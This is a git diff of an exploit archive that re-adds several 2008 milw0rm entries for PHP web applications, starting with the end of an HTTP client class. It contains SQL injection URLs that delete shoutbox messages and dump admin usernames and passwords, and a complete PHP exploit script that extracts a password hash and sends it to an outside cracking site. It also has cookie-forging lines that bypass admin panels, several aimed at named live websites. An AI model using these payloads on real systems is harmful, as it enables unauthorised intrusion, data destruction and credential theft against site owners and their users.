+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		   
+		$urlarr     = parse_url($urltarg);
+		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		if(!isset($urlarr['path']) or empty($urlarr['path']))
+		   die("Error: No path precised");
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->url('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->url($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->url('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->url($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array();
+			break;
+				
+			case 'cookie':
+			$this->cookie = array();
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array();
+			$this->cookie = array();
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+?>
+
+# milw0rm.com [2008-11-04]
diff --git a/platforms/php/webapps/6995.txt b/platforms/php/webapps/6995.txt
index 4479a6bec..dfec5257e 100755
--- a/platforms/php/webapps/6995.txt
+++ b/platforms/php/webapps/6995.txt
@@ -1,39 +1,39 @@
-/*
-    --------------------------------------------------------------
-    phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln
-    --------------------------------------------------------------
-    Discovered By StAkeR[at]hotmail[dot]it
-    Download On http://www.phpbbhacks.com/load.php?id=1595
-    NOTE:  Works Regardless PHP.ini Settings!
-    Thanks darkjoker
-    --------------------------------------------------------------
-    
-    File (shoutbox_view.php)
-    
-    
-    50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id'];
-    
-    
-    
-    168. if ( $mode == "delete" && $adel )
-    169. {
-    170.   $sql = "DELETE FROM " . SHOUTBOX_TABLE . "
-    171.   WHERE id = $id $del_mod";
-    172. if( !($result = $db->sql_query($sql)) )
-    173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); }
-    174.
-    
-    
-    - Delete All Messages
-    - shoutbox_view.php?mode=delete&id=-1 or 1=1/*
-    
-    - Edit Message / Post Message
-    - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
-    
-    
-    - Blind SQL Injection
-    - phpBB2/shoutbox_view.php?mode=delete&id=[Query]
-   
-*/   
-
-# milw0rm.com [2008-11-05]
+/*
+    --------------------------------------------------------------
+    phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln
+    --------------------------------------------------------------
+    Discovered By StAkeR[at]hotmail[dot]it
+    Download On http://www.phpbbhacks.com/load.php?id=1595
+    NOTE:  Works Regardless PHP.ini Settings!
+    Thanks darkjoker
+    --------------------------------------------------------------
+    
+    File (shoutbox_view.php)
+    
+    
+    50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id'];
+    
+    
+    
+    168. if ( $mode == "delete" && $adel )
+    169. {
+    170.   $sql = "DELETE FROM " . SHOUTBOX_TABLE . "
+    171.   WHERE id = $id $del_mod";
+    172. if( !($result = $db->sql_query($sql)) )
+    173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); }
+    174.
+    
+    
+    - Delete All Messages
+    - shoutbox_view.php?mode=delete&id=-1 or 1=1/*
+    
+    - Edit Message / Post Message
+    - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
+    
+    
+    - Blind SQL Injection
+    - phpBB2/shoutbox_view.php?mode=delete&id=[Query]
+   
+*/   
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6996.php b/platforms/php/webapps/6996.php
index d9fc57eb1..929854bf8 100755
--- a/platforms/php/webapps/6996.php
+++ b/platforms/php/webapps/6996.php
@@ -1,192 +1,192 @@
-action = $_GET['action'];
-  12. $this->news_id = $_GET['news_id'];
-  13.
-  14. global $userinfo;
-  15. global $core;
-  16.
-  17. $this->core = $core;
-  18.
-  19. $this->userinfo = $userinfo;
-  20.
-  21.
-  22.
-  23.
-  24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); }
-  25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); }
-  26.
-  27. include("includes/text.inc.php");
-  28. $this->textFun = new textFunctions();
-  29. $this->newsCat = $this->core->db->dbCall("news_categories");
-  30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
-  31.
-  32. switch($this->action){
-  33. case "catrss":
-  34. $this->catRSS();
-  35. break;
-      ...
-   
-   i've found other bugs..:D
-  
-
-   news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
-   Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive...
-   news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/*
-   
- 
-  
-*/   
-
-
-$search = new search;
-
-
-if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv();
-
-
-$uid = intval($argv[2]);
-$host = explode('/',$argv[1]);
-$search->magic();
-
-$code = "\x31\x25\x32\x30\x25\x32\x37\x25\x32".
-        "\x30\x55\x4E\x49\x4F\x4E\x25\x32\x30".
-        "\x41\x4C\x4C\x25\x32\x30\x53\x45\x4C".
-        "\x45\x43\x54\x25\x32\x30\x31\x25\x32".
-        "\x43\x32\x25\x32\x43\x75\x73\x65\x72".
-        "\x6E\x61\x6D\x65\x25\x32\x43\x34\x25".
-        "\x32\x43\x35\x25\x32\x43\x70\x61\x73".
-        "\x73\x77\x6F\x72\x64\x25\x32\x43\x37".
-        "\x25\x32\x43\x38\x25\x32\x30\x66\x72".
-        "\x6F\x6D\x25\x32\x30\x75\x73\x65\x72".
-        "\x73\x25\x32\x30\x77\x68\x65\x72\x65".
-        "\x25\x32\x30\x75\x73\x65\x72\x5F\x69".
-        "\x64\x25\x33\x44".$uid."\x25\x32\x33";
-        
-
-
-$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1\r\n"; 
-$data .= "Host: $host[0]\r\n";
-$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
-$data .= "Accept-Language: en-us,en;q=0.5\r\n";
-$data .= "Accept-Encoding: gzip,deflate\r\n";
-$data .= "Connection: close\r\n\r\n";
-    
-  
-  
-if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!\r\n");
-if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!\r\n"); 
-if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!\r\n");
-if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!\r\n");
-
-while($html = socket_read($socket,1024,PHP_NORMAL_READ)) 
-{ 
-  $content .= $html; 
-} socket_close($socket);
-
-
-
-if(preg_match('/

    ([0-9a-f]{32})/',$content,$result))
-{
-  echo "[+] Exploit Successfully!\r\n";
-  echo "[+] Hash: $result[1]\r\n";
-  echo $search->md5($result[1]);
-
-}
-else
-{
-  echo "[+] Exploit Failed!\r\n";
-  echo "[+] Site Not Vulnerable / ID Not Valid!\r\n";
-  exit;
-}
-
-class search
-{
-  function md5($hash)
-  {
-    if(strlen($hash) != 32) die("hash not valid!\r\n");
-  
-    $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1\r\n"; 
-    $data .= "Host: md5.rednoize.com\r\n";
-    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-    $data .= "Connection: close\r\n\r\n";
-  
-    if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!\n");  
-    if(!fputs($socket,$data)) die("fputs() error!\n");
-
-
-    while(!feof($socket))
-    {
-      $content .= fgets($socket);
-    } fclose($socket);
-  
-    $result = explode(' ',$content);
-  
-    if(isset($result[19]))
-    {
-      return "[+] Password: ".substr($result[19],20,-6)."\r\n";
-    }
-  }
-  
-  function argv()
-  {
-    echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploit\r\n";
-    echo "[+] Usage: php $argv[0] [host/path] [user_id]\r\n";
-    echo "[+] Usage: php $argv[0] localhost/phpx 1\r\n";
-    exit;
-  }
-  
-  function magic()
-  {
-    global $host;
-    
-    $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1\r\n"; 
-    $data .= "Host: $host[0]\r\n";
-    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-    $data .= "Connection: close\r\n\r\n";
-  
-    if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");  
-    if(!fputs($socket,$data)) die("fputs() error!\n");
-
-    while(!feof($socket))
-    {
-      $content .= fgets($socket);
-    } fclose($socket);
-    
-    if(!eregi('error in your SQL',$content))
-    {
-      echo "[+] Magic Quotes On!\r\n[+] Exploit Failed!\r\n";
-      exit;
-    }
-  }
-}
-
-# milw0rm.com [2008-11-05]
+action = $_GET['action'];
+  12. $this->news_id = $_GET['news_id'];
+  13.
+  14. global $userinfo;
+  15. global $core;
+  16.
+  17. $this->core = $core;
+  18.
+  19. $this->userinfo = $userinfo;
+  20.
+  21.
+  22.
+  23.
+  24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); }
+  25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); }
+  26.
+  27. include("includes/text.inc.php");
+  28. $this->textFun = new textFunctions();
+  29. $this->newsCat = $this->core->db->dbCall("news_categories");
+  30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
+  31.
+  32. switch($this->action){
+  33. case "catrss":
+  34. $this->catRSS();
+  35. break;
+      ...
+   
+   i've found other bugs..:D
+  
+
+   news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
+   Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive...
+   news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/*
+   
+ 
+  
+*/   
+
+
+$search = new search;
+
+
+if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv();
+
+
+$uid = intval($argv[2]);
+$host = explode('/',$argv[1]);
+$search->magic();
+
+$code = "\x31\x25\x32\x30\x25\x32\x37\x25\x32".
+        "\x30\x55\x4E\x49\x4F\x4E\x25\x32\x30".
+        "\x41\x4C\x4C\x25\x32\x30\x53\x45\x4C".
+        "\x45\x43\x54\x25\x32\x30\x31\x25\x32".
+        "\x43\x32\x25\x32\x43\x75\x73\x65\x72".
+        "\x6E\x61\x6D\x65\x25\x32\x43\x34\x25".
+        "\x32\x43\x35\x25\x32\x43\x70\x61\x73".
+        "\x73\x77\x6F\x72\x64\x25\x32\x43\x37".
+        "\x25\x32\x43\x38\x25\x32\x30\x66\x72".
+        "\x6F\x6D\x25\x32\x30\x75\x73\x65\x72".
+        "\x73\x25\x32\x30\x77\x68\x65\x72\x65".
+        "\x25\x32\x30\x75\x73\x65\x72\x5F\x69".
+        "\x64\x25\x33\x44".$uid."\x25\x32\x33";
+        
+
+
+$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1\r\n"; 
+$data .= "Host: $host[0]\r\n";
+$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+$data .= "Accept-Language: en-us,en;q=0.5\r\n";
+$data .= "Accept-Encoding: gzip,deflate\r\n";
+$data .= "Connection: close\r\n\r\n";
+    
+  
+  
+if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!\r\n");
+if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!\r\n"); 
+if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!\r\n");
+if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!\r\n");
+
+while($html = socket_read($socket,1024,PHP_NORMAL_READ)) 
+{ 
+  $content .= $html; 
+} socket_close($socket);
+
+
+
+if(preg_match('/

    ([0-9a-f]{32})/',$content,$result))
+{
+  echo "[+] Exploit Successfully!\r\n";
+  echo "[+] Hash: $result[1]\r\n";
+  echo $search->md5($result[1]);
+
+}
+else
+{
+  echo "[+] Exploit Failed!\r\n";
+  echo "[+] Site Not Vulnerable / ID Not Valid!\r\n";
+  exit;
+}
+
+class search
+{
+  function md5($hash)
+  {
+    if(strlen($hash) != 32) die("hash not valid!\r\n");
+  
+    $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1\r\n"; 
+    $data .= "Host: md5.rednoize.com\r\n";
+    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+    $data .= "Connection: close\r\n\r\n";
+  
+    if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!\n");  
+    if(!fputs($socket,$data)) die("fputs() error!\n");
+
+
+    while(!feof($socket))
+    {
+      $content .= fgets($socket);
+    } fclose($socket);
+  
+    $result = explode(' ',$content);
+  
+    if(isset($result[19]))
+    {
+      return "[+] Password: ".substr($result[19],20,-6)."\r\n";
+    }
+  }
+  
+  function argv()
+  {
+    echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploit\r\n";
+    echo "[+] Usage: php $argv[0] [host/path] [user_id]\r\n";
+    echo "[+] Usage: php $argv[0] localhost/phpx 1\r\n";
+    exit;
+  }
+  
+  function magic()
+  {
+    global $host;
+    
+    $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1\r\n"; 
+    $data .= "Host: $host[0]\r\n";
+    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
+    $data .= "Connection: close\r\n\r\n";
+  
+    if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");  
+    if(!fputs($socket,$data)) die("fputs() error!\n");
+
+    while(!feof($socket))
+    {
+      $content .= fgets($socket);
+    } fclose($socket);
+    
+    if(!eregi('error in your SQL',$content))
+    {
+      echo "[+] Magic Quotes On!\r\n[+] Exploit Failed!\r\n";
+      exit;
+    }
+  }
+}
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6997.txt b/platforms/php/webapps/6997.txt
index ea1cb68ad..14a1c61a2 100755
--- a/platforms/php/webapps/6997.txt
+++ b/platforms/php/webapps/6997.txt
@@ -1,43 +1,43 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	PRE PODCAST PORTAL
-[~] Language :         	PHP
-[~] Website[main]:     	http://www.preproject.com
-[~] Website[script]:    http://www.preproject.com/podcast.asp
-[~] Type :             	Commercial
-[~] Report-Date :     	05/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-
-===[ XPL ]===
-
-[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
-[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
-
-
-===[ LIVE ]===
-[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
-[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	PRE PODCAST PORTAL
+[~] Language :         	PHP
+[~] Website[main]:     	http://www.preproject.com
+[~] Website[script]:    http://www.preproject.com/podcast.asp
+[~] Type :             	Commercial
+[~] Report-Date :     	05/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+
+===[ XPL ]===
+
+[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
+[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
+
+
+===[ LIVE ]===
+[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
+[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6998.txt b/platforms/php/webapps/6998.txt
index 9bd67a08b..c5d8fc654 100755
--- a/platforms/php/webapps/6998.txt
+++ b/platforms/php/webapps/6998.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PRE SHOPPING MALL Insecure Cookie Handling
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	PRE SHOPPING MALL
-[~] Language :         	PHP
-[~] Website[main]:     	http://www.preproject.com
-[~] Website[script]:    http://www.preproject.com/emall.asp
-[~] Type :             	Commercial
-[~] Report-Date :     	05/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-Admin Panel: http://localhost/[path]/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ LIVE ]===
-Admin Panel: http://preproject.com/emall/admin/loginform.php
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PRE SHOPPING MALL Insecure Cookie Handling
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	PRE SHOPPING MALL
+[~] Language :         	PHP
+[~] Website[main]:     	http://www.preproject.com
+[~] Website[script]:    http://www.preproject.com/emall.asp
+[~] Type :             	Commercial
+[~] Report-Date :     	05/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+Admin Panel: http://localhost/[path]/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ LIVE ]===
+Admin Panel: http://preproject.com/emall/admin/loginform.php
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6999.txt b/platforms/php/webapps/6999.txt
index 367bcbb10..30e04f4aa 100755
--- a/platforms/php/webapps/6999.txt
+++ b/platforms/php/webapps/6999.txt
@@ -1,55 +1,55 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
-[~] Language :         	PHP
-[~] Website[main]:     	http://www.preproject.com
-[~] Website[script]:    http://www.preproject.com/mcart.asp
-[~] Type :             	Commercial
-[~] Report-Date :     	05/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-admin-panel: http://localhost/[path]/SiteAdmin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-===[ LIVE ]===
-admin-panel: http://preproject.com/prebay/siteadmin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ SQL ]===
-[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
-[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
-[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
-
-
-
-===[ SQL-LIVE ]===
-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
